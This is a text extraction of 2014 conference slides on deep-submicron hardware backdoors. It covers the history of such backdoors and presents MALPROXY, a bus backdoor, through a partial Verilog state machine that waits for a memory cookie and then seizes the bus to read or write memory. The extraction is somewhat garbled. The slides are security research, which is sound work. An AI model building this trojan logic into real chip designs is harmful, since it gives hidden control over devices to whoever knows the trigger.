SlideShare a Scribd company logo
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Deep-Submicron Backdoor 
Syscan Singapore 2014 
Alfredo Ortega 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Agenda 
Deep-Submicron VLSI: Technology smaller than 350nm 
Hardware Backdoors History 
Non-Gov examples 
Unintentional backdoors 
Why create a CPU backdoor 
Malproxy BUS backdoor (Demo) 
RFI Ex
ltration backdoor (Demo) 
Questions 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Introduction 
Hardware": overused 
Not Hardware: 
Regular user-mode backdoors - Re
ections 
on Trusting Trust" 
Weakening of protocols/cryptography (See 
RSA Dual EC DRBG saga) 
Very practical 
Particularly dangerous 
Easy to catch 
Software 
User−mode 
Kernel−mode 
Hypervisor 
Firmware 
Microcode 
Physics 
Regular Rootkits 
Hardware 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Hardware" backdoors? 
Still in software/
rmware 
Specially dangerous if massive (adversary can 
use them) 
More expensive to detect (No AVs) 
Software 
User−mode 
Kernel−mode 
Hypervisor 
Firmware 
Microcode 
Physics 
Regular Rootkits 
Bios Rootkits 
SMM Rootkits 
AMT Rootkits 
Hardware Our talk 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
History 
The Great Seal Bug 
Also called The Thing" 
one of the
rst covert 
listening devices (Found in 
1945) 
Designed by Leon Theremin 
Sound-modulated resonant 
cavity: No external power. 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Clipper chip 
Clipper chip 
Developed and promoted by 
the U.S. NSA 
Announced in 1993 
Skipjack algorithm - Key 
escrow mechanism 
Cryptographer Matt Blaze 
published a serious 
vulnerability. 
Entirely defunct by 1996 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
NSA Ant division Catalog 
NSA ANT Insert catalog 
Catalog of hardware 
backdoors 
Developed from 2005 to 2010 
Leaked by Edward Snowden 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Non-gov examples (Legit backdoors) 
Intel Anti-theft tech 
Network equipment lawful interception 
Research and Academia: 
IEEE Hardware-Oriented Security 
and Trust (HOST) 
NYU-Poly Embedded-System 
Challenge 
Too many to cite. Very advanced. 
Stealthy Dopant-Level Hardware Trojans 
Becker Et. Al. 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Unintentional backdoors 
World-accesible re
ashing mechanisms 
(BIOS,micro-sd, pendrives, etc.) 
Most
rmware-backdoors 
Silicon-PROASIC3 backdoor 
(Skorobogatov Et. Al.) 
JTAG-interfaces 
Convenience/Security tradeo 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Rationale 
No real backdoor on silicon to analyze, 
all theoretical examples. 
Let's make a real one. Our approach: 
Real silicon ASIC design 
Generic and simple payload 
trivial to locate. No eort on stealth. 
Ready for massive deployment 
Two basic attacks: 
1 Bus-intrusion (MALPROXY) 
2 data-ex
ltration (RiFt) 
R i Ft 
MAL PROXY 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Introduction 
High-level design 
Logic 
ASIC 
Usage 
MALPROXY 
3 
4 
7 
1 
2 
13 
12 
11 
10 
9 
15 
Malicious Bus Proxy 
RAM 
BUS 
CPU 
5 
6 
14 
MALPROXY Bus backdoor 
Small malicious state-machine 
Peek/Poke functionality 
AMBA-compatible 
CPU/Software independent 
Real system (ARM Cortex-M0 
DesignStart) 
FPGA and silicon-ready 
Easy to detect 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Introduction 
High-level design 
Logic 
ASIC 
Usage 
MALPROXY 
High-level Design 
Constantly monitoring the AMBA bus. 
If command correctly parsed, take 
control of the bus and modify memory. 
Only two commands needed for 
execution control: 
Peek mem32 
Poke mem32 
If software/arch is known, only Poke 
command is enough. 
Search activation 
cookie 
Read command 
Read address 
Read data 
Execute command 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Introduction 
High-level design 
Logic 
ASIC 
Usage 
MALPROXY: Verilog 
1 // ------------------------------------------------- 
2 // Trivial rootkit coprocessor unit 
3 // ------------------------------------------------- 
4 reg [5:0] RTKState ; 
5 reg [8:0] RTKCmd ; 
6 
7 reg [3:0] RTKCount ; 
8 `define RTK_FIND_START 5'h0 
9 `define RTK_FIND_CMD 5'h1 
10 `define RTK_FIND_DATA 5'h2 
11 `define RTK_FIND_ADDR 5'h3 
12 `define RTK_EXEC 5'h4 
13 `define RTK_EXEC2 5'h5 
14 `define RTK_END 5'h6 
15 `define RTK_CMD_WRITE W 
16 `define RTK_CMD_READ R 
17 
18 // 56 - bit initial cookie 
19 // I.E. memcpy  x78  x56  x34  x12R  xaa  x55  xaa ; 
20 `define RTK_COOKIE_1 32' h12345678 
21 `define RTK_COOKIE_2 24' h434241 
22 `define RTK_COOKIE_3 24' h2D2D2D // --- 
1 always @( posedge HCLK or posedge HRESETn ) 
2 begin 
3 if (! HRESETn ) // Reset 
4 begin 
5 RTKState = `RTK_FIND_START ; 
6 RTKDeviated =0; 
7 end 
8 else begin 
9 case ( RTKState ) 
10 `RTK_FIND_START : // Find first part of cookie 
11 if ( HWDATA == `RTK_COOKIE_1 ) 
12 begin 
13 RTKState = `RTK_FIND_CMD ; 
14 end 
15 `RTK_FIND_CMD : // Load second part of cookie and 
16 begin // single - byte command 
17 if ( HWDATA [31:8] == `RTK_COOKIE_2 ) 
18 begin 
19 RTKCmd = HWDATA [7:0]; 
20 RTKState = `RTK_FIND_DATA ; 
21 RTKCount =0; 
22 end 
23 else RTKState = `RTK_FIND_START ; 
24 end 
Groundworks Technologies Deep-Submicron Backdoor

More Related Content

What's hot

1300 david oswald id and ip theft with side-channel attacks
1300 david oswald   id and ip theft with side-channel attacks1300 david oswald   id and ip theft with side-channel attacks
1300 david oswald id and ip theft with side-channel attacksPositive Hack Days
 
A meta model supporting both hardware and smalltalk-based execution of FPGA c...
A meta model supporting both hardware and smalltalk-based execution of FPGA c...A meta model supporting both hardware and smalltalk-based execution of FPGA c...
A meta model supporting both hardware and smalltalk-based execution of FPGA c...
ESUG
 
Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017
Andriy Berestovskyy
 
Hardware Trojans
Hardware TrojansHardware Trojans
Hardware Trojans
Rahul Krishnamurthy
 
A Hypervisor IPS based on Hardware Assisted Virtualization Technology
A Hypervisor IPS based on Hardware Assisted Virtualization TechnologyA Hypervisor IPS based on Hardware Assisted Virtualization Technology
A Hypervisor IPS based on Hardware Assisted Virtualization TechnologyFFRI, Inc.
 
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald..."Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
PROIDEA
 
Appearances are deceiving: Novel offensive techniques in Windows 10/11 on ARM
Appearances are deceiving: Novel offensive techniques in Windows 10/11 on ARMAppearances are deceiving: Novel offensive techniques in Windows 10/11 on ARM
Appearances are deceiving: Novel offensive techniques in Windows 10/11 on ARM
FFRI, Inc.
 
PROFIBUS frame analysis - Peter Thomas of Control Specialists
PROFIBUS frame analysis - Peter Thomas of Control SpecialistsPROFIBUS frame analysis - Peter Thomas of Control Specialists
PROFIBUS frame analysis - Peter Thomas of Control Specialists
PROFIBUS and PROFINET InternationaI - PI UK
 
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Maksim Shudrak
 
Message Signaled Interrupts
Message Signaled InterruptsMessage Signaled Interrupts
Message Signaled InterruptsAnshuman Biswal
 
VHDL Practical Exam Guide
VHDL Practical Exam GuideVHDL Practical Exam Guide
VHDL Practical Exam Guide
Eslam Mohammed
 
Kaspersky SAS SCADA in the Cloud
Kaspersky SAS SCADA in the CloudKaspersky SAS SCADA in the Cloud
Kaspersky SAS SCADA in the Cloud
qqlan
 
Silicon scanners cambridge report
Silicon scanners cambridge reportSilicon scanners cambridge report
Silicon scanners cambridge report
Liberteks
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Maksim Shudrak
 
Polyteda: Power DRC/LVS, October 2016
Polyteda: Power DRC/LVS, October 2016Polyteda: Power DRC/LVS, October 2016
Polyteda: Power DRC/LVS, October 2016
Oleksandra Nazola
 
Stm32 f4 first touch
Stm32 f4 first touchStm32 f4 first touch
Stm32 f4 first touch
Benux Wei
 
Ipv6 test plan for opnfv poc v2.2 spirent-vctlab
Ipv6 test plan for opnfv poc v2.2 spirent-vctlabIpv6 test plan for opnfv poc v2.2 spirent-vctlab
Ipv6 test plan for opnfv poc v2.2 spirent-vctlab
Iben Rodriguez
 
Developing micro controller applications
Developing micro controller applicationsDeveloping micro controller applications
Developing micro controller applications
Steve Mylroie
 

What's hot (20)

1300 david oswald id and ip theft with side-channel attacks
1300 david oswald   id and ip theft with side-channel attacks1300 david oswald   id and ip theft with side-channel attacks
1300 david oswald id and ip theft with side-channel attacks
 
A meta model supporting both hardware and smalltalk-based execution of FPGA c...
A meta model supporting both hardware and smalltalk-based execution of FPGA c...A meta model supporting both hardware and smalltalk-based execution of FPGA c...
A meta model supporting both hardware and smalltalk-based execution of FPGA c...
 
20141105 asfws-norx-slides
20141105 asfws-norx-slides20141105 asfws-norx-slides
20141105 asfws-norx-slides
 
Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017Why my network does not work? Networking Quiz 2017
Why my network does not work? Networking Quiz 2017
 
Hardware Trojans
Hardware TrojansHardware Trojans
Hardware Trojans
 
A Hypervisor IPS based on Hardware Assisted Virtualization Technology
A Hypervisor IPS based on Hardware Assisted Virtualization TechnologyA Hypervisor IPS based on Hardware Assisted Virtualization Technology
A Hypervisor IPS based on Hardware Assisted Virtualization Technology
 
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald..."Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
"Attacking industrial remote controllers for fun and profit" - Dr. Marco Bald...
 
Appearances are deceiving: Novel offensive techniques in Windows 10/11 on ARM
Appearances are deceiving: Novel offensive techniques in Windows 10/11 on ARMAppearances are deceiving: Novel offensive techniques in Windows 10/11 on ARM
Appearances are deceiving: Novel offensive techniques in Windows 10/11 on ARM
 
PROFIBUS frame analysis - Peter Thomas of Control Specialists
PROFIBUS frame analysis - Peter Thomas of Control SpecialistsPROFIBUS frame analysis - Peter Thomas of Control Specialists
PROFIBUS frame analysis - Peter Thomas of Control Specialists
 
presentation_DRDO
presentation_DRDOpresentation_DRDO
presentation_DRDO
 
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...
 
Message Signaled Interrupts
Message Signaled InterruptsMessage Signaled Interrupts
Message Signaled Interrupts
 
VHDL Practical Exam Guide
VHDL Practical Exam GuideVHDL Practical Exam Guide
VHDL Practical Exam Guide
 
Kaspersky SAS SCADA in the Cloud
Kaspersky SAS SCADA in the CloudKaspersky SAS SCADA in the Cloud
Kaspersky SAS SCADA in the Cloud
 
Silicon scanners cambridge report
Silicon scanners cambridge reportSilicon scanners cambridge report
Silicon scanners cambridge report
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
 
Polyteda: Power DRC/LVS, October 2016
Polyteda: Power DRC/LVS, October 2016Polyteda: Power DRC/LVS, October 2016
Polyteda: Power DRC/LVS, October 2016
 
Stm32 f4 first touch
Stm32 f4 first touchStm32 f4 first touch
Stm32 f4 first touch
 
Ipv6 test plan for opnfv poc v2.2 spirent-vctlab
Ipv6 test plan for opnfv poc v2.2 spirent-vctlabIpv6 test plan for opnfv poc v2.2 spirent-vctlab
Ipv6 test plan for opnfv poc v2.2 spirent-vctlab
 
Developing micro controller applications
Developing micro controller applicationsDeveloping micro controller applications
Developing micro controller applications
 

Similar to Deep submicron-backdoors-ortega-syscan-2014-slides

ARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation Workshop
Saumil Shah
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
Jose Palanco
 
POLYTEDA PowerDRC/LVS overview
POLYTEDA PowerDRC/LVS overviewPOLYTEDA PowerDRC/LVS overview
POLYTEDA PowerDRC/LVS overview
Alexander Grudanov
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
Cyber Security Alliance
 
Using VPP and SRIO-V with Clear Containers
Using VPP and SRIO-V with Clear ContainersUsing VPP and SRIO-V with Clear Containers
Using VPP and SRIO-V with Clear Containers
Michelle Holley
 
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation WorkshopHack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
Saumil Shah
 
26.1.7 lab snort and firewall rules
26.1.7 lab   snort and firewall rules26.1.7 lab   snort and firewall rules
26.1.7 lab snort and firewall rules
Freddy Buenaño
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptx
ssuserfcf43f
 
PowerDRC/LVS 2.2 released by POLYTEDA
PowerDRC/LVS 2.2 released by POLYTEDAPowerDRC/LVS 2.2 released by POLYTEDA
PowerDRC/LVS 2.2 released by POLYTEDA
Alexander Grudanov
 
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
CODE BLUE
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NamePositive Hack Days
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяEkaterina Melnik
 
IoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoIoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco Romano
Codemotion
 
IoT exploitation: from memory corruption to code execution - Marco Romano - C...
IoT exploitation: from memory corruption to code execution - Marco Romano - C...IoT exploitation: from memory corruption to code execution - Marco Romano - C...
IoT exploitation: from memory corruption to code execution - Marco Romano - C...
Codemotion
 
POLYTEDA: Power DRC/LVS, June 2017
POLYTEDA: Power DRC/LVS, June 2017POLYTEDA: Power DRC/LVS, June 2017
POLYTEDA: Power DRC/LVS, June 2017
Oleksandra Nazola
 
2017 - LISA - LinkedIn's Distributed Firewall (DFW)
2017 - LISA - LinkedIn's Distributed Firewall (DFW)2017 - LISA - LinkedIn's Distributed Firewall (DFW)
2017 - LISA - LinkedIn's Distributed Firewall (DFW)
Mike Svoboda
 
PowerDRC/LVS 2.0.1 released by POLYTEDA
PowerDRC/LVS 2.0.1 released by POLYTEDAPowerDRC/LVS 2.0.1 released by POLYTEDA
PowerDRC/LVS 2.0.1 released by POLYTEDA
Alexander Grudanov
 
BRKRST-3068 Troubleshooting Catalyst 2K and 3K.pdf
BRKRST-3068  Troubleshooting Catalyst 2K and 3K.pdfBRKRST-3068  Troubleshooting Catalyst 2K and 3K.pdf
BRKRST-3068 Troubleshooting Catalyst 2K and 3K.pdf
ssusercbaa33
 
Scada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsScada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsAleksandr Timorin
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
CODE BLUE
 

Similar to Deep submicron-backdoors-ortega-syscan-2014-slides (20)

ARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation Workshop
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
 
POLYTEDA PowerDRC/LVS overview
POLYTEDA PowerDRC/LVS overviewPOLYTEDA PowerDRC/LVS overview
POLYTEDA PowerDRC/LVS overview
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Using VPP and SRIO-V with Clear Containers
Using VPP and SRIO-V with Clear ContainersUsing VPP and SRIO-V with Clear Containers
Using VPP and SRIO-V with Clear Containers
 
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation WorkshopHack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
 
26.1.7 lab snort and firewall rules
26.1.7 lab   snort and firewall rules26.1.7 lab   snort and firewall rules
26.1.7 lab snort and firewall rules
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptx
 
PowerDRC/LVS 2.2 released by POLYTEDA
PowerDRC/LVS 2.2 released by POLYTEDAPowerDRC/LVS 2.2 released by POLYTEDA
PowerDRC/LVS 2.2 released by POLYTEDA
 
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the Name
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имя
 
IoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoIoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco Romano
 
IoT exploitation: from memory corruption to code execution - Marco Romano - C...
IoT exploitation: from memory corruption to code execution - Marco Romano - C...IoT exploitation: from memory corruption to code execution - Marco Romano - C...
IoT exploitation: from memory corruption to code execution - Marco Romano - C...
 
POLYTEDA: Power DRC/LVS, June 2017
POLYTEDA: Power DRC/LVS, June 2017POLYTEDA: Power DRC/LVS, June 2017
POLYTEDA: Power DRC/LVS, June 2017
 
2017 - LISA - LinkedIn's Distributed Firewall (DFW)
2017 - LISA - LinkedIn's Distributed Firewall (DFW)2017 - LISA - LinkedIn's Distributed Firewall (DFW)
2017 - LISA - LinkedIn's Distributed Firewall (DFW)
 
PowerDRC/LVS 2.0.1 released by POLYTEDA
PowerDRC/LVS 2.0.1 released by POLYTEDAPowerDRC/LVS 2.0.1 released by POLYTEDA
PowerDRC/LVS 2.0.1 released by POLYTEDA
 
BRKRST-3068 Troubleshooting Catalyst 2K and 3K.pdf
BRKRST-3068  Troubleshooting Catalyst 2K and 3K.pdfBRKRST-3068  Troubleshooting Catalyst 2K and 3K.pdf
BRKRST-3068 Troubleshooting Catalyst 2K and 3K.pdf
 
Scada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsScada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanisms
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
 

Recently uploaded

Hemostasis_importance& clinical significance.pptx
Hemostasis_importance& clinical significance.pptxHemostasis_importance& clinical significance.pptx
Hemostasis_importance& clinical significance.pptx
muralinath2
 
Circulatory system_ Laplace law. Ohms law.reynaults law,baro-chemo-receptors-...
Circulatory system_ Laplace law. Ohms law.reynaults law,baro-chemo-receptors-...Circulatory system_ Laplace law. Ohms law.reynaults law,baro-chemo-receptors-...
Circulatory system_ Laplace law. Ohms law.reynaults law,baro-chemo-receptors-...
muralinath2
 
Leaf Initiation, Growth and Differentiation.pdf
Leaf Initiation, Growth and Differentiation.pdfLeaf Initiation, Growth and Differentiation.pdf
Leaf Initiation, Growth and Differentiation.pdf
RenuJangid3
 
extra-chromosomal-inheritance[1].pptx.pdfpdf
extra-chromosomal-inheritance[1].pptx.pdfpdfextra-chromosomal-inheritance[1].pptx.pdfpdf
extra-chromosomal-inheritance[1].pptx.pdfpdf
DiyaBiswas10
 
GBSN- Microbiology (Lab 3) Gram Staining
GBSN- Microbiology (Lab 3) Gram StainingGBSN- Microbiology (Lab 3) Gram Staining
GBSN- Microbiology (Lab 3) Gram Staining
Areesha Ahmad
 
filosofia boliviana introducción jsjdjd.pptx
filosofia boliviana introducción jsjdjd.pptxfilosofia boliviana introducción jsjdjd.pptx
filosofia boliviana introducción jsjdjd.pptx
IvanMallco1
 
Seminar of U.V. Spectroscopy by SAMIR PANDA
 Seminar of U.V. Spectroscopy by SAMIR PANDA Seminar of U.V. Spectroscopy by SAMIR PANDA
Seminar of U.V. Spectroscopy by SAMIR PANDA
SAMIR PANDA
 
erythropoiesis-I_mechanism& clinical significance.pptx
erythropoiesis-I_mechanism& clinical significance.pptxerythropoiesis-I_mechanism& clinical significance.pptx
erythropoiesis-I_mechanism& clinical significance.pptx
muralinath2
 
Comparing Evolved Extractive Text Summary Scores of Bidirectional Encoder Rep...
Comparing Evolved Extractive Text Summary Scores of Bidirectional Encoder Rep...Comparing Evolved Extractive Text Summary Scores of Bidirectional Encoder Rep...
Comparing Evolved Extractive Text Summary Scores of Bidirectional Encoder Rep...
University of Maribor
 
Multi-source connectivity as the driver of solar wind variability in the heli...
Multi-source connectivity as the driver of solar wind variability in the heli...Multi-source connectivity as the driver of solar wind variability in the heli...
Multi-source connectivity as the driver of solar wind variability in the heli...
Sérgio Sacani
 
RNA INTERFERENCE: UNRAVELING GENETIC SILENCING
RNA INTERFERENCE: UNRAVELING GENETIC SILENCINGRNA INTERFERENCE: UNRAVELING GENETIC SILENCING
RNA INTERFERENCE: UNRAVELING GENETIC SILENCING
AADYARAJPANDEY1
 
Orion Air Quality Monitoring Systems - CWS
Orion Air Quality Monitoring Systems - CWSOrion Air Quality Monitoring Systems - CWS
Orion Air Quality Monitoring Systems - CWS
Columbia Weather Systems
 
Structural Classification Of Protein (SCOP)
Structural Classification Of Protein  (SCOP)Structural Classification Of Protein  (SCOP)
Structural Classification Of Protein (SCOP)
aishnasrivastava
 
Structures and textures of metamorphic rocks
Structures and textures of metamorphic rocksStructures and textures of metamorphic rocks
Structures and textures of metamorphic rocks
kumarmathi863
 
Comparative structure of adrenal gland in vertebrates
Comparative structure of adrenal gland in vertebratesComparative structure of adrenal gland in vertebrates
Comparative structure of adrenal gland in vertebrates
sachin783648
 
Astronomy Update- Curiosity’s exploration of Mars _ Local Briefs _ leadertele...
Astronomy Update- Curiosity’s exploration of Mars _ Local Briefs _ leadertele...Astronomy Update- Curiosity’s exploration of Mars _ Local Briefs _ leadertele...
Astronomy Update- Curiosity’s exploration of Mars _ Local Briefs _ leadertele...
NathanBaughman3
 
EY - Supply Chain Services 2018_template.pptx
EY - Supply Chain Services 2018_template.pptxEY - Supply Chain Services 2018_template.pptx
EY - Supply Chain Services 2018_template.pptx
AlguinaldoKong
 
role of pramana in research.pptx in science
role of pramana in research.pptx in sciencerole of pramana in research.pptx in science
role of pramana in research.pptx in science
sonaliswain16
 
NuGOweek 2024 Ghent - programme - final version
NuGOweek 2024 Ghent - programme - final versionNuGOweek 2024 Ghent - programme - final version
NuGOweek 2024 Ghent - programme - final version
pablovgd
 
SCHIZOPHRENIA Disorder/ Brain Disorder.pdf
SCHIZOPHRENIA Disorder/ Brain Disorder.pdfSCHIZOPHRENIA Disorder/ Brain Disorder.pdf
SCHIZOPHRENIA Disorder/ Brain Disorder.pdf
SELF-EXPLANATORY
 

Recently uploaded (20)

Hemostasis_importance& clinical significance.pptx
Hemostasis_importance& clinical significance.pptxHemostasis_importance& clinical significance.pptx
Hemostasis_importance& clinical significance.pptx
 
Circulatory system_ Laplace law. Ohms law.reynaults law,baro-chemo-receptors-...
Circulatory system_ Laplace law. Ohms law.reynaults law,baro-chemo-receptors-...Circulatory system_ Laplace law. Ohms law.reynaults law,baro-chemo-receptors-...
Circulatory system_ Laplace law. Ohms law.reynaults law,baro-chemo-receptors-...
 
Leaf Initiation, Growth and Differentiation.pdf
Leaf Initiation, Growth and Differentiation.pdfLeaf Initiation, Growth and Differentiation.pdf
Leaf Initiation, Growth and Differentiation.pdf
 
extra-chromosomal-inheritance[1].pptx.pdfpdf
extra-chromosomal-inheritance[1].pptx.pdfpdfextra-chromosomal-inheritance[1].pptx.pdfpdf
extra-chromosomal-inheritance[1].pptx.pdfpdf
 
GBSN- Microbiology (Lab 3) Gram Staining
GBSN- Microbiology (Lab 3) Gram StainingGBSN- Microbiology (Lab 3) Gram Staining
GBSN- Microbiology (Lab 3) Gram Staining
 
filosofia boliviana introducción jsjdjd.pptx
filosofia boliviana introducción jsjdjd.pptxfilosofia boliviana introducción jsjdjd.pptx
filosofia boliviana introducción jsjdjd.pptx
 
Seminar of U.V. Spectroscopy by SAMIR PANDA
 Seminar of U.V. Spectroscopy by SAMIR PANDA Seminar of U.V. Spectroscopy by SAMIR PANDA
Seminar of U.V. Spectroscopy by SAMIR PANDA
 
erythropoiesis-I_mechanism& clinical significance.pptx
erythropoiesis-I_mechanism& clinical significance.pptxerythropoiesis-I_mechanism& clinical significance.pptx
erythropoiesis-I_mechanism& clinical significance.pptx
 
Comparing Evolved Extractive Text Summary Scores of Bidirectional Encoder Rep...
Comparing Evolved Extractive Text Summary Scores of Bidirectional Encoder Rep...Comparing Evolved Extractive Text Summary Scores of Bidirectional Encoder Rep...
Comparing Evolved Extractive Text Summary Scores of Bidirectional Encoder Rep...
 
Multi-source connectivity as the driver of solar wind variability in the heli...
Multi-source connectivity as the driver of solar wind variability in the heli...Multi-source connectivity as the driver of solar wind variability in the heli...
Multi-source connectivity as the driver of solar wind variability in the heli...
 
RNA INTERFERENCE: UNRAVELING GENETIC SILENCING
RNA INTERFERENCE: UNRAVELING GENETIC SILENCINGRNA INTERFERENCE: UNRAVELING GENETIC SILENCING
RNA INTERFERENCE: UNRAVELING GENETIC SILENCING
 
Orion Air Quality Monitoring Systems - CWS
Orion Air Quality Monitoring Systems - CWSOrion Air Quality Monitoring Systems - CWS
Orion Air Quality Monitoring Systems - CWS
 
Structural Classification Of Protein (SCOP)
Structural Classification Of Protein  (SCOP)Structural Classification Of Protein  (SCOP)
Structural Classification Of Protein (SCOP)
 
Structures and textures of metamorphic rocks
Structures and textures of metamorphic rocksStructures and textures of metamorphic rocks
Structures and textures of metamorphic rocks
 
Comparative structure of adrenal gland in vertebrates
Comparative structure of adrenal gland in vertebratesComparative structure of adrenal gland in vertebrates
Comparative structure of adrenal gland in vertebrates
 
Astronomy Update- Curiosity’s exploration of Mars _ Local Briefs _ leadertele...
Astronomy Update- Curiosity’s exploration of Mars _ Local Briefs _ leadertele...Astronomy Update- Curiosity’s exploration of Mars _ Local Briefs _ leadertele...
Astronomy Update- Curiosity’s exploration of Mars _ Local Briefs _ leadertele...
 
EY - Supply Chain Services 2018_template.pptx
EY - Supply Chain Services 2018_template.pptxEY - Supply Chain Services 2018_template.pptx
EY - Supply Chain Services 2018_template.pptx
 
role of pramana in research.pptx in science
role of pramana in research.pptx in sciencerole of pramana in research.pptx in science
